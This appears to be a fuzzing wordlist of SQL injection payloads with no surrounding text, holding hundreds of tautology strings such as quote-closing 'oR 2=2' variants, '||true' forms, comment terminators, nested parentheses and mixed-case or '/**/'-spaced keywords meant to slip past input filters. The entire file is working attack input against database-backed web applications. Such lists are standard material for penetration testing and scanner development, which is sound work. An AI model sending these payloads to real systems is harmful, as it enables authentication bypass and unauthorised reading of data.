true
'&'
"&"
'^'
"^"
'*'
"*"
0=0
'='
"="
')&('
")&("
')^('
")^("
')*('
")*("
0)=(0
')=('
")=("
'))&(('
"))&(("
'))^(('
"))^(("
'))*(('
"))*(("
0))=((0
'))=(('
"))=(("
2'LIkE'3
2"LIkE"3
-3')LIkE('3
-3")LIkE("3
-3'))LIkE(('3
-3"))LIkE(("3
-3 oR 2=2
-3' oR 2=2-- 2
-3' oR 2=2#
-3' oR 2=2/*
-3" oR 2=2-- 2
-3" oR 2=2#
-3" oR 2=2/*
-3 oR 2
-3' oR 2-- 2
-3' oR 2#
-3' oR 2/*
-3" oR 2-- 2
-3" oR 2#
-3" oR 2/*
-3 oR 2>0
-3' oR 2>0-- 2
-3' oR 2>0#
-3' oR 2>0/*
-3" oR 2>0-- 2
-3" oR 2>0#
-3" oR 2>0/*
-3 oR 0<2
-3' oR 0<2-- 2
-3' oR 0<2#
-3' oR 0<2/*
-3" oR 0<2-- 2
-3" oR 0<2#
-3" oR 0<2/*
-3 oR 2 LIkE 2
-3' oR 2 LIkE 2-- 2
-3' oR 2 LIkE 2#
-3' oR 2 LIkE 2/*
-3" oR 2 LIkE 2-- 2
-3" oR 2 LIkE 2#
-3" oR 2 LIkE 2/*
-3 oR '2'='2'
-3' oR 2 oR '
-3'oR'2'oR'
-3" oR 2 oR "
-3"oR"2"oR"
-3 oR true
-3' oR true-- 2
-3' oR true#
-3' oR true/*
-3" oR true-- 2
-3" oR true#
-3" oR true/*
-3'oR''+'2
-3"oR""+"2
-3'oR''-'-2
-3"oR""-"-2
-3'oR'2'&'2
-3"oR"2"&"2
-3'oR''^'2
-3"oR""^"2
-3'oR'2'*'2
-3"oR"2"*"2
-3'oR'2'>'0
-3"oR"0"<"2
-3'oR'2'='2
-3"oR"2"="2
-3/**/oR/**/2=2
-3'/**/oR/**/2=2#
-3'/**/oR/**/2=2/*
-3"/**/oR/**/2=2#
-3"/**/oR/**/2=2/*
-3/**/oR/**/2
-3'/**/oR/**/2#
-3'/**/oR/**/2/*
-3"/**/oR/**/2#
-3"/**/oR/**/2/*
-3/**/oR/**/2>0
-3'/**/oR/**/2>0#
-3'/**/oR/**/2>0/*
-3"/**/oR/**/2>0#
-3"/**/oR/**/2>0/*
-3/**/oR/**/0<2
-3'/**/oR/**/0<2#
-3'/**/oR/**/0<2/*
-3"/**/oR/**/0<2#
-3"/**/oR/**/0<2/*
-3/**/oR/**/2/**/LIkE/**/2
-3'/**/oR/**/2/**/LIkE/**/2#
-3'/**/oR/**/2/**/LIkE/**/2/*
-3"/**/oR/**/2/**/LIkE/**/2#
-3"/**/oR/**/2/**/LIkE/**/2/*
-3/**/oR/**/'2'='2'
-3'/**/oR/**/2/**/oR/**/'
-3"/**/oR/**/2/**/oR/**/"
-3/**/oR/**/true
-3'/**/oR/**/true#
-3'/**/oR/**/true/*
-3"/**/oR/**/true#
-3"/**/oR/**/true/*
-3||2=2
-3'||2=2-- 2
-3'||2=2#
-3'||2=2/*
-3"||2=2-- 2
-3"||2=2#
-3"||2=2/*
-3||2
-3'||2-- 2
-3'||2#
-3'||2/*
-3"||2-- 2
-3"||2#
-3"||2/*
-3||2>0
-3'||2>0-- 2
-3'||2>0#
-3'||2>0/*
-3"||2>0-- 2
-3"||2>0#
-3"||2>0/*
-3||0<2
-3'||0<2-- 2
-3'||0<2#
-3'||0<2/*
-3"||0<2-- 2
-3"||0<2#
-3"||0<2/*
-3||(2)LIkE(2)
-3'||(2)LIkE(2)-- 2
-3'||(2)LIkE(2)#
-3'||(2)LIkE(2)/*
-3"||(2)LIkE(2)-- 2
-3"||(2)LIkE(2)#
-3"||(2)LIkE(2)/*
-3||'2'='2'
-3'||'2'='2
-3"||"2"="2
-3'||2||'
-3'||'2'||'
-3"||2||"
-3"||"2"||"
-3||true
-3'||true-- 2
-3'||true#
-3'||true/*
-3"||true-- 2
-3"||true#
-3"||true/*
-3'||''+'2
-3"||""+"2
-3'||''-'-2
-3"||""-"-2
-3'||'2'&'2
-3"||"2"&"2
-3'||''^'2
-3"||""^"2
-3'||'2'*'2
-3"||"2"*"2
(-3)oR(2)=(2)
-3'oR(2)=(2)#
-3'oR(2)=(2)/*
-3"oR(2)=(2)#
-3"oR(2)=(2)/*
(-3)oR(2)
-3'oR(2)#
-3'oR(2)/*
-3"oR(2)#
-3"oR(2)/*
(-3)oR(2)LIkE(2)
-3'oR(2)LIkE(2)#
-3'oR(2)LIkE(2)/*
-3"oR(2)LIkE(2)#
-3"oR(2)LIkE(2)/*
(-3)oR'2'='2'
-3"oR"(2)"="(2)
-3'oR(2)oR'
-3"oR(2)oR"
(-3)oR(true)
-3'oR(true)#
-3'oR(true)/*
-3"oR(true)#
-3"oR(true)/*
-3)oR(2)=(2
-3')oR(2)=2-- 2
-3')oR(2)=2#
-3')oR(2)=2/*
-3")oR(2)=2-- 2
-3")oR(2)=2#
-3")oR(2)=2/*
-3)oR(2
-3')oR(2)-- 2
-3')oR(2)#
-3')oR(2)/*
-3")oR(2)-- 2
-3")oR(2)#
-3")oR(2)/*
-3)oR(2)>(0
-3')oR(2)>0-- 2
-3')oR(2)>0#
-3')oR(2)>0/*
-3")oR(2)>0-- 2
-3")oR(2)>0#
-3")oR(2)>0/*
-3)oR(0)<(2
-3')oR(0)<2-- 2
-3')oR(0)<2#
-3')oR(0)<2/*
-3")oR(0)<2-- 2
-3")oR(0)<2#
-3")oR(0)<2/*
-3)oR(2)LIkE(2
-3')oR(2)LIkE(2)-- 2
-3')oR(2)LIkE(2)#
-3')oR(2)LIkE(2)/*
-3")oR(2)LIkE(2)-- 2
-3")oR(2)LIkE(2)#
-3")oR(2)LIkE(2)/*
-3)oR'2'=('2'
-3')oR'2'=('2
-3")oR"2"=("2
-3')oR(2)oR('
-3')oR'2'oR('
-3")oR(2)oR("
-3")oR"2"oR("
-3)oR(true
-3')oR(true)-- 2
-3')oR(true)#
-3')oR(true)/*
-3")oR(true)-- 2
-3")oR(true)#
-3")oR(true)/*
-3')oR''+('2
-3")oR""+("2
-3')oR''-('-2
-3")oR""-("-2
-3')oR'2'&('2
-3")oR"2"&("2
-3')oR''^('2
-3")oR""^("2
-3')oR'2'*('2
-3")oR"2"*("2
-3')/**/oR/**/2/**/oR/**/('
-3")/**/oR/**/2/**/oR/**/("
-3)||2=(2
-3')||2=2-- 2
-3')||2=2#
-3')||2=2/*
-3")||2=2-- 2
-3")||2=2#
-3")||2=2/*
-3)||(2
-3')||2-- 2
-3')||2#
-3')||2/*
-3")||2-- 2
-3")||2#
-3")||2/*
-3||(2)LIkE(2
-3')||(2)LIkE2-- 2
-3')||(2)LIkE2#
-3')||(2)LIkE2/*
-3")||(2)LIkE2-- 2
-3")||(2)LIkE2#
-3")||(2)LIkE2/*
-3)||'2'=('2'
-3')||'2'=('2
-3")||"2"=("2
-3')||2||('
-3')||'2'||('
-3")||2||("
-3")||"2"||("
-3)||(true
-3')||(true)-- 2
-3')||(true)#
-3')||(true)/*
-3")||(true)-- 2
-3")||(true)#
-3")||(true)/*
-3')||''+('2
-3")||""+("2
-3')||''-('-2
-3")||""-("-2
-3')||'2'&('2
-3")||"2"&("2
-3')||''^('2
-3")||""^("2
-3')||'2'*('2
-3")||"2"*("2
-3))oR(2)=((2
-3'))oR(2)=2-- 2
-3'))oR(2)=2#
-3'))oR(2)=2/*
-3"))oR(2)=2-- 2
-3"))oR(2)=2#
-3"))oR(2)=2/*
-3))oR((2
-3'))oR(2)-- 2
-3'))oR(2)#
-3'))oR(2)/*
-3"))oR(2)-- 2
-3"))oR(2)#
-3"))oR(2)/*
-3))oR(2)>((0
-3'))oR(2)>0-- 2
-3'))oR(2)>0#
-3'))oR(2)>0/*
-3"))oR(2)>0-- 2
-3"))oR(2)>0#
-3"))oR(2)>0/*
-3))oR(0)<((2
-3'))oR(0)<2-- 2
-3'))oR(0)<2#
-3'))oR(0)<2/*
-3"))oR(0)<2-- 2
-3"))oR(0)<2#
-3"))oR(0)<2/*
-3))oR(2)LIkE((2
-3'))oR(2)LIkE(2)-- 2
-3'))oR(2)LIkE(2)#
-3'))oR(2)LIkE(2)/*
-3"))oR(2)LIkE(2)-- 2
-3"))oR(2)LIkE(2)#
-3"))oR(2)LIkE(2)/*
-3))oR'2'=(('2'
-3'))oR'2'=(('2
-3"))oR"2"=(("2
-3'))oR(2)oR(('
-3'))oR'2'oR(('
-3"))oR(2)oR(("
-3"))oR"2"oR(("
-3))oR((true
-3'))oR(true)-- 2
-3'))oR(true)#
-3'))oR(true)/*
-3"))oR(true)-- 2
-3"))oR(true)#
-3"))oR(true)/*
-3'))oR''+(('2
-3"))oR""+(("2
-3'))oR''-(('-2
-3"))oR""-(("-2
-3'))oR'2'&(('2
-3"))oR"2"&(("2
-3'))oR''^(('2
-3"))oR""^(("2
-3'))oR'2'*(('2
-3"))oR"2"*(("2
-3))||2=((2
-3'))||2=2-- 2
-3'))||2=2#
-3'))||2=2/*
-3"))||2=2-- 2
-3"))||2=2#
-3"))||2=2/*
-3))||((2
-3'))||2-- 2
-3'))||2#
-3'))||2/*
-3"))||2-- 2
-3"))||2#
-3"))||2/*
-3||(2)LIkE((2
-3'))||(2)LIkE2-- 2
-3'))||(2)LIkE2#
-3'))||(2)LIkE2/*
-3"))||(2)LIkE2-- 2
-3"))||(2)LIkE2#
-3"))||(2)LIkE2/*
-3))||'2'=(('2'
-3'))||'2'=(('2
-3"))||"2"=(("2
-3'))||2||(('
-3'))||'2'||(('
-3"))||2||(("
-3"))||"2"||(("
-3))||((true
-3'))||(true)-- 2
-3'))||(true)#
-3'))||(true)/*
-3"))||(true)-- 2
-3"))||(true)#
-3"))||(true)/*
-3'))||''+(('2
-3"))||""+(("2
-3'))||''-(('-2
-3"))||""-(("-2
-3'))||'2'&(('2
-3"))||"2"&(("2
-3'))||''^(('2
-3"))||""^(("2
-3'))||'2'*(('2
-3"))||"2"*(("2